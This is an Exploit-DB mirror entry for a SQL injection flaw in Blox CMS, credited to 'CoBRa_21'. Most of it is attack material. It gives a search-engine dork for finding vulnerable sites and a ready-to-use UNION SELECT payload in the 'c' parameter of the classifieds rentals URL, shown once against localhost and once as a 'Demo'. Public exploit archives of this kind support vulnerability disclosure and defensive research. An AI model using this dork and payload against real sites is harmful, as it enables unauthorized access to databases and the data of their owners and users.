exploit-db-mirror/platforms/php/webapps/12729.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

24 lines
No EOL
802 B
Text
Executable file

-------------------------------------------------------------------------------------------
Blox CMS SQL Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Script Home: http://bloxcms.com/
Dork: Powered by Blox CMS from TownNews.com
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15
Demo :
http://www.site.com/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15
-------------------------------------------------------------------------------------------